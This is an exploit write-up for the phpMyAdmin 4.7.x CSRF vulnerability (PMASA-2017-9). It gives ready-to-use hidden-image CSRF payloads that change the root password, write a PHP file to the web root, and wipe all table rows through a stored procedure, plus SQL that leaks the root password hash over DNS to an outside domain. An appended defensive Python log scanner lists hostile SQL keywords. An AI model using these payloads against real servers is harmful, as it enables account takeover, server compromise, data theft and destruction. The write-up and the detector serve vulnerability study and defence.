phpMyAdmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9) Exploit

Author: @Ambulong

phpMyAdmin is a well-known MySQL/MariaDB online management tool. The phpMyAdmin team released version 4.7.7, which addresses the CSRF vulnerability found by Barot (PMASA-2017-9). The vulnerability allows an attacker to execute arbitrary SQL statements silently by inducing an administrator to visit a malicious page.


1 phpMyAdmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9)


In this article, we will use VulnSpy's online phpMyAdmin environment to demonstrate exploitation of this vulnerability.

VulnSpy's online phpMyAdmin environment address: https://www.vulnspy.com/?u=pmasa-2017-9

2 Exploit CSRF - Modifying the password of current user

Change the current user's password to www.vulnspy.com with the following SQL command:

SET password=PASSWORD('www.vulnspy.com');

Exploit Demonstration

2.1 Log in to phpMyAdmin

Username: root Password: toor

[Screenshot: phpMyAdmin login]

2.2 Create a page with malicious code.

Filename: 2.payload.html

<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />

2.3 Open the file 2.payload.html in a browser

[Screenshot: 2.payload.html]

Go back to phpMyAdmin: you'll find that the account has been logged out automatically and that the password of root has been changed.

[Screenshot: 2.payload.html, after the request]

2.4 Login successfully with the password www.vulnspy.com

[Screenshot: Password Changed]

3 Exploit CSRF - Arbitrary File Write

Write the code <?php phpinfo();?> to the file /var/www/html/test.php with the following SQL command (this requires the FILE privilege and a secure_file_priv setting that permits writing to that path):

select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';

Exploit Demonstration

3.1 Payload

<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';" style="display:none;" />

3.2 Open the file containing the payload in a browser

3.3 Visit test.php

[Screenshot: phpinfo()]

4 Exploit CSRF - Data Retrieval over DNS

Steal the password hash of root with the following SQL command:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.vulnspy.com\\test'));

Fetch the current database name:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.vulnspy.com\\test'));

VSPlate does not support this exploit: the UNC-path trick relies on a MySQL server running on Windows, where LOAD_FILE resolves the hostname before reading, and on the FILE privilege.

5 Exploit CSRF - Empty All Rows From All Tables

Empty all rows from all tables with the following SQL commands:

DROP PROCEDURE IF EXISTS EMPT;
DELIMITER $$
CREATE PROCEDURE EMPT()
BEGIN
DECLARE i INT;
SET i = 0;
-- Walk the first 100 user tables; the i-th row of information_schema.TABLES gives the next target.
WHILE i < 100 DO
SET @del = (SELECT CONCAT('DELETE FROM ',TABLE_SCHEMA,'.',TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE '%_schema' and TABLE_SCHEMA!='mysql' LIMIT i,1);
-- Run the built DELETE as a prepared statement; once the tables run out @del is NULL and the loop aborts with an error.
PREPARE STMT FROM @del;
EXECUTE STMT;
SET i = i +1;
END WHILE;
END $$
DELIMITER ;
CALL EMPT();

Exploit Demonstration

5.1 Payload

<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A" style="display:none;" />

5.2 Open the file containing the payload in a browser

5.3 Go back to phpMyAdmin

You'll find that the data in the databases vulnspy_tables and vulnspy_test has been deleted.

[Screenshot: Empty DBS]
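As an added defensive example (not code from this write-up or from phpMyAdmin), the following Python script scans web-server access-log lines for the pattern that all four payloads above share: a GET request to sql.php or import.php carrying a sql_query parameter, which normal phpMyAdmin use submits via POST together with its token. The log lines, the hostnames and the keyword list are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format); not taken from the write-up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2018:10:00:01 +0000] "GET /phpmyadmin/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.vulnspy.com%27) HTTP/1.1" 200 512 "http://attacker.example/2.payload.html" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2018:10:00:02 +0000] "GET /phpmyadmin/import.php?db=mysql&table=user&sql_query=select+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%27/var/www/html/test.php%27%3B HTTP/1.1" 200 512 "http://attacker.example/3.payload.html" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2018:10:00:03 +0000] "POST /phpmyadmin/import.php HTTP/1.1" 200 2048 "http://pma.example.internal/phpmyadmin/" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2018:10:00:04 +0000] "GET /phpmyadmin/sql.php?db=vulnspy_test&table=t1&pos=0 HTTP/1.1" 200 2048 "http://pma.example.internal/phpmyadmin/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"')

# Scripts the write-up abuses: before 4.7.7 they accepted sql_query from a GET request without a token.
VULN_SCRIPTS = ("sql.php", "import.php")
# Keywords matching the write-up's payload classes (password change, file write, DNS exfil, mass delete).
HIGH_RISK = ("PASSWORD(", "INTO OUTFILE", "INTO DUMPFILE", "LOAD_FILE(", "DROP ", "DELETE ", "CREATE PROCEDURE")

def classify(line, own_hosts):
    """Return a finding for a GET request that carries sql_query to a vulnerable script, else None.

    own_hosts: hostnames that legitimately serve this phpMyAdmin; a Referer elsewhere means cross-site.
    """
    m = LOG_RE.match(line)
    if not m or m.group("method") != "GET":
        return None                      # normal phpMyAdmin traffic submits SQL via POST with a token
    parts = urlsplit(m.group("target"))
    script = parts.path.rsplit("/", 1)[-1]
    if script not in VULN_SCRIPTS:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "sql_query" not in params:
        return None                      # browsing a table with ?db=...&table=...&pos=0 is fine
    sql = params["sql_query"][0]         # parse_qs has already percent-decoded and turned '+' into spaces
    hits = [k for k in HIGH_RISK if k in sql.upper()]
    ref_host = urlsplit(m.group("referer")).hostname or ""
    return {
        "ip": m.group("ip"), "ts": m.group("ts"), "script": script, "sql": sql,
        "cross_site": bool(ref_host) and ref_host not in own_hosts,
        "severity": "high" if hits else "medium", "indicators": hits,
    }

def scan(log_text, own_hosts=("pma.example.internal",)):
    """Run classify over every line and return the findings in log order."""
    return [f for f in (classify(l, own_hosts) for l in log_text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['severity']:6} {f['script']} cross_site={f['cross_site']} {f['indicators']} :: {f['sql']}")
```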